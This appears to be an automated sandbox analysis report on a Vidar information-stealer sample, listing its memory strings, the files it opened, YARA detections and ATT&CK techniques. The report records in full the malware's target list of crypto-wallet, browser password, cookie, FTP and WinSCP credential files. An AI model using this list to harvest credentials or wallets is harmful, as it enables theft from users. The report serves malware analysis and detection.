Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\\Coinomi\Coinomi\wallets\\*.wallet;Tq''
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pb	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json	Jump to behavior
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json	Jump to behavior
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: Yara match	File source: 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2351838122.0000000000558000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7036, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.build2.exe.36715a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.build2.exe.36715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 6264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7036, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 Scheduled Task/Job	1 DLL Side-Loading	2 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
